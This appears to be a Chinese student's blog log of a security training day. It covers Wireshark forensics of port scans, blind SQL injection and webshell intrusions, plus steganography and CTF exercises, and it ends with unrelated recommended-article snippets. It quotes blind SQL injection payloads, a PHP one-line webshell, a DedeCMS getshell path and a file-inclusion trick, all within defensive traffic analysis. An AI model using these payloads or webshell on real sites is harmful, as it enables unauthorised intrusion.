实训记录-周二

最新推荐文章于 2025-08-05 23:58:52 发布
原创 最新推荐文章于 2025-08-05 23:58:52 发布 · 606 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #学习方法 #wireshark

Day-2 流量分析实战+隐写

上午-流量分析实战

1 SYN半链接攻击流量分析

打开电线鲨鱼
分析流量包

可见大量SYN半连接端口号都不一样
所以攻击者在扫描网站开放端口
过滤条件:
ip.src == 192.168.177.145 and tcp.flags.syn == 1 and tcp.flags.ack == 1

2 SQL注入攻击流量分析一

过滤条件:
id=1’and if(length(database())=0,1,0)–+
id=1’and if(ascii(substr(database(),7,1))>79,1,0) --+
采用布尔盲注

you are in …

3 SQL注入攻击流量分析二

http and (ip.src192.168.177.1 or ip.dst 192.168.177.145)

id=1’ and if(length(database())=1,sleep(5),0) --+
id=1’ and if((select%20substring(database(),1,1))=“a”,sleep(5),1) --+

更高级的时间盲注

4 Web入侵溯源一

发现一堆
http.response.code == 404
明显是扫后台呢
head 请求,对网站进行目录爆破

踪流->http 流,找到↓
admin_name=admin&admin_pwd=密码&submit=%B5%C7%C2%BC&act=do_login
中的admin_pwd字段
攻击者对其进行了爆破

然后发现代码
@eval($_POST['x']);

a 首先,黑客通过目录扫描,获取了后台管理地址。
b 然后通过弱口令爆破,获取到了 admin 账户的密码,登录了后台。
c 在对后台功能进行一番探索之后,找到了 admin/tpl_manage.php 文件可以通过目录遍历查看并修改任意文件的内容。由此通过修改 index.php 的内容,插入了 php 一句话木马。
d 最后,黑客向 index 页面的一句话木马传递 phpinfo() 确认了一句话写入成功。

5 Web入侵溯源二

1、使用 Wireshark 打开 webattack2.pcap 数据包。
2、因为是对 web 攻击进行溯源分析 ,所以我们只需要关注 http 协议的数据包 。所以在显示过滤器中输入 http 过滤出 http 协议的数据包。
搜索条件:
http and ((ip.src==192.168.177.1 and ip.dst==192.168.177.145) or (ip.src==192.168.177.145 and ip.dst==192.168.177.1))
3、通过对数据包的观察,前面部分的数据包为正常访问的数据包。
4、从数据包编号为 1544 的包开始,开始出现 head 请求,以及大量的 404 响应,推测黑客正在对网站进行目录爆破
5、爆破完成后,流量中出现对 /dede/login.php 的访问记录。因为 dede 为 dedecms 的默认后台地址。此时黑客可能已经获取到了后台路径,且开始尝试登陆。
6、查看 POST 数据包的内容,发现提交内容的用户名为 admin,密码为 123456 等弱口令,猜测黑客此时在进行弱口令测试。
7、随后,出现了 index.php访问记录,观察前一个数据包的返回内容,其返回的内容为 JS 跳转,跳转到 index 页面,猜测此时黑客可能已经登录成功。
8、之后黑客访问了 dede/ad_add.php 这个页面,dedecms 在 5.7 版本,这个页面存在 getshell漏洞,黑客应该是想利用此漏洞来进行 getshell。查看黑客此次 POST 提交的内容。发现了一句话木马。可以证实黑客是进行了 getshell 的操作。
9、之后出现了大量的对 ad_js.php 页面的 POST 请求,查看请求的内容,为 php 代码。此时黑客可能已经成功 getshell,使用菜刀工具对 webshell 进行了连接。

下午-流量分析与二进制ctf取证

密码追踪

Wireshark
过滤httpftp
使用数据流分析即可
好像没啥好说的

数据包文件分析

流量分析找到密文

流量数据隐写分析

藏在图片里

数据包中的线索

按长度排序
找到上传的图片,里面藏了密码
在流量文件里分离出zip加密文件,里面藏了flag

文件分析(隐写)

比较简单了
主要就是flag藏在图片二进制文件里了
然后就是png图片改大小以及base32编码
最后就是爆破一个压缩包

晚上-写了一会ctf的题

大部分都是简单题,基本上会基础操作都能想出来。
有一道题是:

highlight_file(__FILE__);

if(isset($_GET['file'])) {
    $str = $_GET['file'];

    include $_GET['file'];
}

存在文件包含漏洞
所以在网址后传参%file=/flag
即可得到flag

项目实训记录10
qq_44695724的博客
07-28 134
记录本周完成工作: 项目实训已经接近尾声,第四周是最后阶段,各个模块分组任务都已经完成,进行调试组合 2021年7月20日 周二 今日完成工作 继续完成检索题目模块功能,尚未完工 预计明日完成 与计划的偏差:无 需要协调帮助:无 2021年7月22日 周四 今日完成工作 已完成题目检索,提交代码进行整合 与其他组合作进行题库和试卷功能联调 预计明日完成 与计划的偏差:无 需要协调帮助:无 2021年7月25日 周日 今日完成工作 完成3、4组联调,题库试卷组合部分已
实训周二
qq_38844897的博客
05-19 366
ArrayList的创建:ArrayListstringList=new ArrayList(); 装什么类型的数据尖括号里面就写什么类型的对象 代码如下: public class Eleven { public static void main(String[] args) { Scanner in=new Scanner(System.in); System.out.
Python实训-15天-博客汇总表
upward
01-04 1669
Python实训-15天-博客汇总表
实训报告万能模板计算机专业,计算机实训报告模板
weixin_29819789的博客
06-16 1926
计算机实训报告模板计算机专业的同学们,大家一定要参加过实训吧,那么大家知道计算机实训报告怎么写吗?以下是小编为大家整理好的计算机实训报告模板,一起看看吧!篇【1】:计算机实训报告模板一、实训目的1、 贯彻坚强实践环节和理论联系实际的教学原则,增加学生对专业感性认识的深广度,运用所学知识和技能为后续课程奠定较好的基础,计算机实训报告。2、通过实习,开阔学生眼界和知识面,获得计算机硬件安装和系统维护的...
android计算器实训报告总结,计算机实训总结报告【三篇】
weixin_35820423的博客
05-26 2189
高校计算机实训课程具有较强的实践性,要求应用能力高、紧贴市场的需求。本文是无忧考网为大家整理的计算机实训报告,仅供参考。计算机实训总结报告【一】【实训目的】1、掌握系统安装的基本过程。2、了解主机箱内部构造与实现系统安装.【实训条件】能正常运行的计算机、系统U盘、螺丝刀。【实训任务】1、完成主机的拆装与组装。2、完成系统的安装,并且计算机能够正常的运行。【实训思考】1、说明了主机内部硬件每个的功能...
大学生html5实训报告,大学生实训心得体会范文(精选5篇)
weixin_39834788的博客
06-03 2759
大学生实训心得体会范文(精选5篇)当我们积累了新的体会时,应该马上记录下来,写一篇心得体会,如此就可以提升我们写作能力了。你想好怎么写心得体会了吗?下面是小编整理的大学生实训心得体会范文(精选5篇),仅供参考,大家一起来看看吧。大学生实训心得体会1五月,在各种丰富多彩的校园生活中我们迎来了在校的第一次实训专周,这次实训的目的是为了加强对导游专业的认知理解,了解导游景点讲解的方法和特点,提高导游讲解...
计算机维修实训报告1000,测量实训报告的总结1000字.docx
weixin_39636691的博客
07-10 346
测量实训报告总结1000字测量实训报告总结1000字篇一  一、实习目的与要求:  测量学教学实习是测量学的重要组成部分,其目的是巩固、扩大和加深学生从课堂所学的理论知识,获得测量实际工作的初步经验和基本技能,着重培养学生的独立工作能力,进一步熟练掌握测量仪器的操作技能,提高计算和绘图能力,并对测绘小区域大比例尺地形图的全过程有一个全面和系统的认识,为今后解决实际工作中的有关测量问题打下坚实的基础...
【3dCG】——期中创新实训记录(4)
LanXinYue98的博客
05-05 289
本次记录为第六周的工作情况 第六周将第一幕男主的动作分小节导入场景,放置摄像机,k关键帧。 第六周 周一 收到第一幕第二节动作,即人物走路,由于动作捕捉不能捕捉手指的动作,手指呈现僵硬地垂直状,需要进行关键帧调整。 将手指和手腕调节至合适的角度,修改该关键帧,并且冻结旋转,删除后续关键帧,见下图: 周二 完成第三个场景的调整,即走至餐桌前,拉开椅子,坐下,捂脸...
【3dCG】——期中创新实训记录
LanXinYue98的博客
04-14 277
本次记录主要内容为 第三周完成的主要工作:第一轮场景材质和灯光布置渲染 第四周的主要工作:动作捕捉 3-4周,也就是四月初我们的三维制作团队主要进行项目的中期阶段。 我们完成的任务有两个主要场景的白模附上材质和颜色,摆放灯光,以及动作设计与彩排,实际运用光学动作捕捉设备捕捉。 我完成的主要任务为: 1】单层现代公寓房屋室内模型的所有物品的材质和贴图,以及灯光效果。 2...
37205-00-SQL-Server-2005课后实训参考答案.doc
07-15
使用简单的`SELECT`语句结合`WHERE`子句,可以筛选出特定条件下的记录。 ```sql USE Xk GO SELECT DepartName FROM Department WHERE DepartNo='03' GO ``` 这里通过指定系部编号`DepartNo`为“03”,查找对应的系部...
2022电子商务个人实训报告.docx
05-27
- **背景概述**:本实训报告记录了一次针对电子商务专业的认知实习活动,旨在通过实际操作和现场参观等形式,加深学生对电子商务理论知识的理解,并增强其实践能力。 - **实训目的**: - 深入理解电子商务的基本...
2019-2020学年第一学期2018级JSP程序设计课程实训指导书.doc
12-24
缺勤超过一定学时将影响最终评级,例如超过18学时且无请假记录将失去实训成绩。 ### 实训要求 学生需充分理解实训的目的和要求,上机操作前需仔细阅读实训指导书。在整个实训过程中,学生应积极参与,严格遵守实训...
Fabarta个人专属智能体限时体验中:高效、安全的长文写作新搭档
Fabarta的博客
08-01 407
此外,报告还提到了数据孤岛、数据质量不高的问题,这些都阻碍了企业的跨域协同,也降低了企业的数据向知识转化的效率。在保证用户的资料、文件与数据完全私密不泄露的情况下,该产品完美融合了用户本地数据与互联网上可以触达的公开信息,快速应答用户的各类请求与问题。1)王律师基于个人构建好的本地知识库,输入需求:“分析本案胜诉关键点,撰写金融借款合同纠纷证据规则实务指南,引用3个类案,字数2000左右”;5)智能体生成专业化内容,王律师可实时调整个别段落,对不满意的段落进行改写、润色,插入类案对比等;
星图云开发者平台赋能商储油安全管控数字化转型
DevMate的博客
08-05 339
某商业储备油分公司是其集团公司国家原油商业储备的生产经营主体,肩负着15座跨省市油库的安全管理重任。在传统管理模式下,总部对分散库区的监管面临严峻挑战:由于地理位置分散,储罐液位波动、设备异常运行等关键状态无法实时获取,往往依赖人工逐级上报导致决策滞后;各库区独立建设的安防系统、设备监测平台数据格式互不兼容,标准不统一,形成数据协同壁垒;当突发泄漏或火灾险情时,应急资源调度依赖电话协调与纸质预案,响应效率难以满足快速处置要求。
Goby 漏洞安全通告| NestJS DevTools /inspector/graph/interact 命令执行漏洞(CVE-2025-54782)
m0_46699477的博客
08-05 175
其 /inspector/graph/interact 接口存在远程代码执行漏洞(CVE-2025-54782)。攻击者可以通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。该漏洞允许攻击者通过特制的代码注入在受影响的 NestJS DevTools 服务器上执行任意命令,可能导致服务器被完全控制、数据泄露和系统崩溃等严重后果。
Web 安全之开放重定向攻击(Open Redirect )详解
路多辛的所思所想
08-03 940
摘要: 开放重定向漏洞存在于网站不安全处理用户可控URL时,攻击者通过构造恶意链接将用户从可信网站重定向至钓鱼或恶意网站。攻击流程包括诱骗用户点击、服务器执行重定向、最终实施窃取信息等攻击。防范措施包括避免直接使用用户输入URL、实施白名单验证、使用相对路径及重定向确认页面。该漏洞虽不直接破坏系统,但会显著提高钓鱼攻击成功率,需通过严格验证和定期安全审计加以防范。(149字)
Python包安全工程实践:构建安全可靠的Python生态系统
最新发布
Programming Talk
08-05 200
建立了安全开发流程与规范实现了依赖安全管理与漏洞扫描应用了现代加密与安全通信技术设计了认证授权系统集成了安全审计与监控实施了漏洞管理与应急响应应用了安全测试技术保障了供应链安全完整安全示例可在GitHub查看:[安全工程示例仓库]零信任架构应用运行时应用自保护(RASP)机密计算技术合规自动化(如GDPR、CCPA)
安全扫描:目标主机支持RSA密钥交换问题
weixin_50859396的博客
08-04 737
Nginx中禁用RSA加密算法需配置ssl_ciphers排除所有含RSA的套件,仅保留ECDSA等非RSA算法。具体步骤:1)修改配置文件,设置ssl_ciphers为HIGH:!aNULL:!MD5:!RSA;2)推荐使用ECDSA证书;3)验证配置后重载Nginx。注意事项:需确保使用ECDSA证书避免兼容问题,且评估客户端支持情况。该方案能提升安全性,避免RSA潜在风险。
OAuth 2.0 的安全升级版授权协议 OAuth 2.1 详解
路多辛的所思所想
08-02 700
OAuth 2.1 是对 OAuth 2.0 协议的一次重大更新,废弃了不安全的用法,整合了最新的安全实践,从而提高了协议的安全性和易用性。虽然“OAuth 2.1”从名称上看起来像是一个全新的版本,但实际上并非对 OAuth 2.0 的彻底的颠覆,其实是 OAuth 2.0 的最佳实践集合,整合了多年来社区反馈的最佳使用方式并做了必要的安全性改进。
物理与电子信息学院jsp实训项目
03-18
### JSP实训项目的背景与意义 JSP(Java Server Pages)是一种用于构建动态网页的技术,能够实现跨平台的应用开发[^1]。对于物理与电子信息学院的学生而言,通过实际项目训练可以加深对JSP的理解并提升实践能力。 以下是几个适合物理与电子信息学院学生的JSP实训项目示例: --- ### 1. **实验室设备管理系统** 该系统旨在帮助物理与电子信息学院管理其实验室中的各种设备资源。主要功能包括: - 设备信息录入、查询和修改。 - 借还记录管理。 - 用户权限控制(管理员、教师、学生角色区分)。 #### 技术要点 - 使用数据库存储设备信息以及借还记录- 利用Spring Boot框架简化后台逻辑处理[^3]。 - 结合MyBatis完成数据持久化操作。 ```java // 示例代码:设备实体类定义 public class Equipment { private int id; private String name; private String status; // Getter and Setter methods... } ``` --- ### 2. **科研成果展示网站** 此项目专注于为学院提供一个在线发布最新研究成果的平台。核心模块有: - 成果上传与审核流程。 - 多媒体资料支持(图片、视频等形式)。 - 访问统计分析。 #### 关键特性 - 动态生成HTML页面以适应不同类型的科研内容显示需求。 - 集成第三方API增强交互体验,比如图表绘制工具ECharts。 ```javascript // ECharts配置实例 var chartDom = document.getElementById('main'); var myChart = echarts.init(chartDom); var option = { title: { text: '访问量趋势' }, tooltip: {}, xAxis: { data: ['周一', '周二', ..., '周日'] }, yAxis: {}, series: [{ type: 'line', data: [10, 20, ... ,80]}] }; myChart.setOption(option); ``` --- ### 3. **教学资源共享平台** 创建一个供师生分享课件、讲义及其他学习材料的地方。特色如下: - 文件分类导航便于查找特定学科领域的内容。 - 支持评论交流促进知识传播。 - 安全机制防止未授权下载行为发生。 #### 开发建议 - 运用Bootstrap美化前端界面布局。 - 考虑到可能涉及大量文件传输情况,优化服务器性能成为必要环节之一。 ```xml <!-- Bootstrap按钮样式 --> <button type="button" class="btn btn-primary">上传新文档</button> ``` --- ### 4. **实验预约服务平台** 允许学生提前预定所需使用的仪器时间槽位,减少排队等待现象。基本构成要素含括但不限于以下几个方面: - 时间段划分规则设定。 - 自动发送提醒邮件通知参与者具体安排详情。 - 数据可视化呈现预约热度分布状况以便调整策略。 #### 注意事项 - 确保系统的稳定性和可靠性,因为这直接影响用户体验满意度。 - 参考企业网络架构设计思路来规划整个解决方案部署环境[^2]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值